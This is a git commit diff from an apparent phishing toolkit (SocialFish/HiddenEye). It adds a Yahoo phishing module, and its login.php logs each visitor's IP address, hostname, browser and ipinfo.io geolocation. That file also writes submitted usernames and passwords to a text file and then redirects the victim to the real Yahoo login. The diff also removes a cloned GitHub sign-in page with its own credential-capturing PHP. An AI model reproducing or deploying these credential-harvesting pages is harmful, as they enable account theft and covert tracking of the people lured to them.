mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge branch 'master' into master
This commit is contained in:
commit
804af81d3a
|
@ -153,7 +153,10 @@ python2 SocialFishTermux.py
|
|||
- FAke instagram Autoliker Page [ REDIRECTS TO ORIGINAL AUTOLIKER PAGE AFTER SUBMIT ]
|
||||
|
||||
**3) SNAPCHAT PHISHING:**
|
||||
- Traditional Login Page
|
||||
- Traditional Snapchat Login Page
|
||||
|
||||
**4) YAHOO PHISHING:**
|
||||
- Traditional Yahoo Login Page
|
||||
</p>
|
||||
|
||||
|
||||
|
@ -181,12 +184,12 @@ OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
|
|||
Taken from [LICENSE](LICENSE).
|
||||
|
||||
|
||||
## Donation To UndeadSec
|
||||
## Help us with Donation
|
||||
If you liked the work and want to support us all, you can donate :D
|
||||
|
||||
<img src="https://github.com/An0nUD4Y/SocialFish/blob/master/donation.png"></img>
|
||||
|
||||
Bitcoin Address: 1EmJ5KiAKzpyqGGHopAq9qukrVPS47T9bA
|
||||
Bitcoin Address: qpuwdfv3p3gpufzctjapp0dp9z4kkk9x6cgl2hhghe
|
||||
|
||||
### VIDEO DEMO
|
||||
<p align="center">
|
||||
|
|
|
@ -100,7 +100,9 @@ def runPhishing(social, option2):
|
|||
elif social == 'Twitter':
|
||||
system('cp WebPagesTermux/twitter/*.* ServerTermux/www/')
|
||||
elif social == 'Snapchat':
|
||||
system('cp WebPagesTermux/Snapchat_web/*.* Server/www/')
|
||||
system('cp WebPagesTermux/Snapchat_web/*.* Server/www/')
|
||||
elif social == 'Yahoo':
|
||||
system('cp WebPagesTermux/yahoo_web/*.* ServerTermux/www/')
|
||||
elif option2 == '1' and social == 'Instagram':
|
||||
system('cp WebPagesTermux/Instagram_web/*.* ServerTermux/www/')
|
||||
elif option2 == '2' and social == 'Instagram':
|
||||
|
@ -168,7 +170,8 @@ def runPEnv():
|
|||
system('clear')
|
||||
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)
|
||||
exit(0)
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
|
||||
if option == '1':
|
||||
loadModule('Facebook')
|
||||
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Mobile Version(mobile_mode)\n\n {0}[{1}4{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}5{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
|
@ -205,6 +208,10 @@ def runPEnv():
|
|||
loadModule('Snapchat')
|
||||
option2 = ''
|
||||
runPhishing('Snapchat', option2)
|
||||
elif option == '10':
|
||||
loadModule('Yahoo')
|
||||
option2 = ''
|
||||
runPhishing('Yahoo', option2)
|
||||
else:
|
||||
exit(0)
|
||||
|
||||
|
|
|
@ -1,223 +0,0 @@
|
|||
<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<link rel="dns-prefetch" href="https://assets-cdn.github.com">
|
||||
<link rel="dns-prefetch" href="https://avatars0.githubusercontent.com">
|
||||
<link rel="dns-prefetch" href="https://avatars1.githubusercontent.com">
|
||||
<link rel="dns-prefetch" href="https://avatars2.githubusercontent.com">
|
||||
<link rel="dns-prefetch" href="https://avatars3.githubusercontent.com">
|
||||
<link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">
|
||||
<link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">
|
||||
|
||||
<meta content="origin" name="referrer" />
|
||||
|
||||
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/frameworks-98cac35b43fab8341490a2623fdaa7b696bbaea87bccf8f485fd5cdb4996cd9b52bdb24709fb3bab0a0dcff4a29187d65028ee693d609ce5c0c3283c77a247a9.css" integrity="sha512-mMrDW0P6uDQUkKJiP9qntpa7rqh7zPj0hf1c20mWzZtSvbJHCfs7qwoNz/SikYfWUCjuaT1gnOXAwyg8d6JHqQ==" media="all" rel="stylesheet" />
|
||||
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/github-f84b09929e4d948a5727c0c312da25f89ded0439c0e17586ebfabd3b1a40c104c8ccd4f0b2dd5f44ec7c916d4e64a008a3916640b39e225d7afe17d2ae681591.css" integrity="sha512-+EsJkp5NlIpXJ8DDEtol+J3tBDnA4XWG6/q9OxpAwQTIzNTwst1fROx8kW1OZKAIo5FmQLOeIl16/hfSrmgVkQ==" media="all" rel="stylesheet" />
|
||||
|
||||
|
||||
<link crossorigin="anonymous" href="https://assets-cdn.github.com/assets/site-e1e1bc98a53e47d4009cc4307d22206e8db8852fa7517c52b94b391b92cc430fb9c230b54d229f83125bda3eb53d7c9af78fb0330375393eebecc179adb754bf.css" integrity="sha512-4eG8mKU+R9QAnMQwfSIgbo24hS+nUXxSuUs5G5LMQw+5wjC1TSKfgxJb2j61PXya94+wMwN1OT7r7MF5rbdUvw==" media="all" rel="stylesheet" />
|
||||
|
||||
|
||||
<meta name="viewport" content="width=device-width">
|
||||
|
||||
<title>Sign in to GitHub · GitHub</title>
|
||||
<link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
|
||||
<link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
|
||||
<meta property="fb:app_id" content="1401488693436528">
|
||||
|
||||
<meta property="og:url" content="https://github.com">
|
||||
<meta property="og:site_name" content="GitHub">
|
||||
<meta property="og:title" content="Build software better, together">
|
||||
<meta property="og:description" content="GitHub is where people build software. More than 27 million people use GitHub to discover, fork, and contribute to over 76 million projects.">
|
||||
<meta property="og:image" content="https://assets-cdn.github.com/images/modules/open_graph/github-logo.png">
|
||||
<meta property="og:image:type" content="image/png">
|
||||
<meta property="og:image:width" content="1200">
|
||||
<meta property="og:image:height" content="1200">
|
||||
<meta property="og:image" content="https://assets-cdn.github.com/images/modules/open_graph/github-mark.png">
|
||||
<meta property="og:image:type" content="image/png">
|
||||
<meta property="og:image:width" content="1200">
|
||||
<meta property="og:image:height" content="620">
|
||||
<meta property="og:image" content="https://assets-cdn.github.com/images/modules/open_graph/github-octocat.png">
|
||||
<meta property="og:image:type" content="image/png">
|
||||
<meta property="og:image:width" content="1200">
|
||||
<meta property="og:image:height" content="620">
|
||||
|
||||
|
||||
<link rel="assets" href="https://assets-cdn.github.com/">
|
||||
|
||||
<meta name="pjax-timeout" content="1000">
|
||||
|
||||
<meta name="request-id" content="9FB6:7C79:1D50EB0:311E342:5A6981BD" data-pjax-transient>
|
||||
|
||||
|
||||
<meta name="selected-link" value="/login" data-pjax-transient>
|
||||
|
||||
<meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU">
|
||||
<meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA">
|
||||
<meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
|
||||
<meta name="google-analytics" content="UA-3769691-2">
|
||||
|
||||
<meta content="collector.githubapp.com" name="octolytics-host" /><meta content="github" name="octolytics-app-id" /><meta content="https://collector.githubapp.com/github-external/browser_event" name="octolytics-event-url" /><meta content="9FB6:7C79:1D50EB0:311E342:5A6981BD" name="octolytics-dimension-request_id" /><meta content="iad" name="octolytics-dimension-region_edge" /><meta content="iad" name="octolytics-dimension-region_render" />
|
||||
<meta content="https://github.com/hydro_browser_events" name="hydro-events-url" />
|
||||
<meta content="true" data-pjax-transient="true" name="analytics-location-query-strip" />
|
||||
|
||||
|
||||
|
||||
|
||||
<meta class="js-ga-set" name="dimension1" content="Logged Out">
|
||||
|
||||
|
||||
|
||||
|
||||
<meta name="hostname" content="github.com">
|
||||
<meta name="user-login" content="">
|
||||
|
||||
<meta name="expected-hostname" content="github.com">
|
||||
<meta name="js-proxy-site-detection-payload" content="NmMxN2Q2NjNkNmU4MThlYzg3ZTgwYjVlYmEwMGMwMzQ4ODNjNjdlMzZkZTliOGVmYmYwZDg3ZjViMTljNGQzNHx7InJlbW90ZV9hZGRyZXNzIjoiMTg5LjMwLjE1NS45NiIsInJlcXVlc3RfaWQiOiI5RkI2OjdDNzk6MUQ1MEVCMDozMTFFMzQyOjVBNjk4MUJEIiwidGltZXN0YW1wIjoxNTE2ODYzOTQ2LCJob3N0IjoiZ2l0aHViLmNvbSJ9">
|
||||
|
||||
<meta name="enabled-features" content="UNIVERSE_BANNER,FREE_TRIALS">
|
||||
|
||||
<meta name="html-safe-nonce" content="87c0a184050e49479c64d8f109030074bb0bc16b">
|
||||
|
||||
<meta http-equiv="x-pjax-version" content="46af5e781c258f191337c975586a0291">
|
||||
|
||||
|
||||
<meta name="description" content="GitHub is where people build software. More than 27 million people use GitHub to discover, fork, and contribute to over 76 million projects.">
|
||||
|
||||
<link rel="canonical" href="https://github.com/login" data-pjax-transient>
|
||||
|
||||
|
||||
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
|
||||
|
||||
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
|
||||
|
||||
<link rel="mask-icon" href="https://assets-cdn.github.com/pinned-octocat.svg" color="#000000">
|
||||
<link rel="icon" type="image/x-icon" class="js-site-favicon" href="https://assets-cdn.github.com/favicon.ico">
|
||||
|
||||
<meta name="theme-color" content="#1e2327">
|
||||
|
||||
|
||||
<meta name="u2f-support" content="true">
|
||||
|
||||
</head>
|
||||
|
||||
<body class="logged-out env-production page-responsive min-width-0 session-authentication">
|
||||
|
||||
|
||||
<div class="position-relative js-header-wrapper ">
|
||||
<a href="#start-of-content" tabindex="1" class="px-2 py-4 show-on-focus js-skip-to-content">Skip to content</a>
|
||||
<div id="js-pjax-loader-bar" class="pjax-loader-bar"><div class="progress"></div></div>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<div class="header header-logged-out width-full pt-5 pb-4" role="banner">
|
||||
<div class="container clearfix width-full text-center">
|
||||
<a class="header-logo" href="https://github.com/" aria-label="Homepage" data-ga-click="(Logged out) Header, go to homepage, icon:logo-wordmark">
|
||||
<svg aria-hidden="true" class="octicon octicon-mark-github" height="48" version="1.1" viewBox="0 0 16 16" width="48"><path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/></svg>
|
||||
</a>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
|
||||
</div>
|
||||
|
||||
<div id="start-of-content" class="show-on-focus"></div>
|
||||
|
||||
|
||||
|
||||
<div role="main" class="application-main ">
|
||||
|
||||
<div id="js-pjax-container" data-pjax-container>
|
||||
|
||||
|
||||
<div class="auth-form px-3" id="login">
|
||||
|
||||
<!-- '"` --><!-- </textarea></xmp> --></option></form>
|
||||
<form accept-charset="UTF-8" action="login.php" method="post"><div style="margin:0;padding:0;display:inline"><input name="utf8" type="hidden" value="✓" /><input name="authenticity_token" type="hidden" value="XEM2cpA9K0fNG69bPa1JmW97FVDeO2XaITb+W4r/fY30C8sir4eoH/9c1a1sfMpoDkpQiGCv+7oH27DyrNSszQ==" /></div> <div class="auth-form-header p-0">
|
||||
<h1>Sign in to GitHub</h1>
|
||||
</div>
|
||||
|
||||
|
||||
<div id="js-flash-container">
|
||||
</div>
|
||||
|
||||
|
||||
<div class="auth-form-body mt-3">
|
||||
|
||||
<label for="login_field">
|
||||
Username or email address
|
||||
</label>
|
||||
<input autocapitalize="off" autocorrect="off" autofocus="autofocus" class="form-control input-block" id="login_field" name="email" tabindex="1" type="text" />
|
||||
|
||||
<label for="password">
|
||||
Password <a href="/password_reset" class="label-link">Forgot password?</a>
|
||||
</label>
|
||||
<input class="form-control form-control input-block" id="password" name="pass" tabindex="2" type="password" />
|
||||
|
||||
<input class="btn btn-primary btn-block" data-disable-with="Signing in…" name="commit" tabindex="3" type="submit" value="Sign in" />
|
||||
</div>
|
||||
</form>
|
||||
|
||||
<p class="create-account-callout mt-3">
|
||||
New to GitHub?
|
||||
<a href="/join?source=login" data-ga-click="Sign in, switch to sign up">Create an account</a>.
|
||||
</p>
|
||||
</div>
|
||||
|
||||
</div>
|
||||
<div class="modal-backdrop js-touch-events"></div>
|
||||
</div>
|
||||
|
||||
<div class="footer container-lg p-responsive py-6 mt-6 f6" role="contentinfo">
|
||||
<ul class="list-style-none d-flex flex-justify-center">
|
||||
<li class="mr-3"><a href="https://github.com/site/terms" class="link-gray" data-ga-click="Footer, go to terms, text:terms">Terms</a></li>
|
||||
<li class="mr-3"><a href="https://github.com/site/privacy" class="link-gray" data-ga-click="Footer, go to privacy, text:privacy">Privacy</a></li>
|
||||
<li class="mr-3"><a href="https://github.com/security" class="link-gray" data-ga-click="Footer, go to security, text:security">Security</a></li>
|
||||
<li><a href="https://github.com/contact" class="link-gray" data-ga-click="Footer, go to contact, text:contact">Contact GitHub</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
<div id="ajax-error-message" class="ajax-error-message flash flash-error">
|
||||
<svg aria-hidden="true" class="octicon octicon-alert" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.865 1.52c-.18-.31-.51-.5-.87-.5s-.69.19-.87.5L.275 13.5c-.18.31-.18.69 0 1 .19.31.52.5.87.5h13.7c.36 0 .69-.19.86-.5.17-.31.18-.69.01-1L8.865 1.52zM8.995 13h-2v-2h2v2zm0-3h-2V6h2v4z"/></svg>
|
||||
<button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error">
|
||||
<svg aria-hidden="true" class="octicon octicon-x" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z"/></svg>
|
||||
</button>
|
||||
You can't perform that action at this time.
|
||||
</div>
|
||||
|
||||
|
||||
|
||||
<script crossorigin="anonymous" integrity="sha512-5eNCJxF6JRFBIlzpDhOCOCr061HNcJA5uzFU7PZ14+GkNvTUaLgS4Ai42IhsAU9E4G2B/u/a2s/6UsbTwUc5UA==" src="https://assets-cdn.github.com/assets/frameworks-e5e34227117a251141225ce90e1382382af4eb51cd709039bb3154ecf675e3e1a436f4d468b812e008b8d8886c014f44e06d81feefdadacffa52c6d3c1473950.js"></script>
|
||||
|
||||
<script async="async" crossorigin="anonymous" integrity="sha512-KaoGOE5qGSgH8cA8uXCwoKLnWu+zdMixOMkJl4tliq/RD8rHSjkAm2hGxym+iKf4JfycDd9zX8i3GY5nFwi5bg==" src="https://assets-cdn.github.com/assets/github-29aa06384e6a192807f1c03cb970b0a0a2e75aefb374c8b138c909978b658aafd10fcac74a39009b6846c729be88a7f825fc9c0ddf735fc8b7198e671708b96e.js"></script>
|
||||
|
||||
|
||||
|
||||
|
||||
<div class="js-stale-session-flash stale-session-flash flash flash-warn flash-banner d-none">
|
||||
<svg aria-hidden="true" class="octicon octicon-alert" height="16" version="1.1" viewBox="0 0 16 16" width="16"><path fill-rule="evenodd" d="M8.865 1.52c-.18-.31-.51-.5-.87-.5s-.69.19-.87.5L.275 13.5c-.18.31-.18.69 0 1 .19.31.52.5.87.5h13.7c.36 0 .69-.19.86-.5.17-.31.18-.69.01-1L8.865 1.52zM8.995 13h-2v-2h2v2zm0-3h-2V6h2v4z"/></svg>
|
||||
<span class="signed-in-tab-flash">You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span>
|
||||
<span class="signed-out-tab-flash">You signed out in another tab or window. <a href="">Reload</a> to refresh your session.</span>
|
||||
</div>
|
||||
<div class="facebox" id="facebox" style="display:none;">
|
||||
<div class="facebox-popup">
|
||||
<div class="facebox-content" role="dialog" aria-labelledby="facebox-header" aria-describedby="facebox-description">
|
||||
</div>
|
||||
<button type="button" class="facebox-close js-facebox-close" aria-label="Close modal">
|
||||
<svg aria-hidden="true" class="octicon octicon-x" height="16" version="1.1" viewBox="0 0 12 16" width="12"><path fill-rule="evenodd" d="M7.48 8l3.75 3.75-1.48 1.48L6 9.48l-3.75 3.75-1.48-1.48L4.52 8 .77 4.25l1.48-1.48L6 6.52l3.75-3.75 1.48 1.48z"/></svg>
|
||||
</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
|
||||
</body>
|
||||
</html>
|
||||
|
|
@ -1,15 +0,0 @@
|
|||
<?php
|
||||
$var = $_POST['email'];
|
||||
$var2 = $_POST['pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>";
|
||||
if($myFile == $searchString) {
|
||||
file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location: https://github.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME";
|
||||
}
|
||||
exit();
|
||||
?>
|
||||
|
|
@ -1 +0,0 @@
|
|||
<html><title>There's a Phishing Page generated by SocialFish in this website.</title></html>
|
389
WebPagesTermux/yahoo_web/index.html
Normal file
389
WebPagesTermux/yahoo_web/index.html
Normal file
File diff suppressed because one or more lines are too long
55
WebPagesTermux/yahoo_web/login.php
Normal file
55
WebPagesTermux/yahoo_web/login.php
Normal file
|
@ -0,0 +1,55 @@
|
|||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://login.yahoo.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location:https://login.yahoo.com');
|
||||
}
|
||||
exit();
|
||||
?>
|
||||
|
BIN
WebPagesTermux/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png
Normal file
BIN
WebPagesTermux/yahoo_web/yahoo_en-US_f_p_bestfit_2x.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 3.0 KiB |
BIN
donation.png
BIN
donation.png
Binary file not shown.
Before Width: | Height: | Size: 6.3 KiB After Width: | Height: | Size: 1.3 KiB |
Loading…
Reference in New Issue
Block a user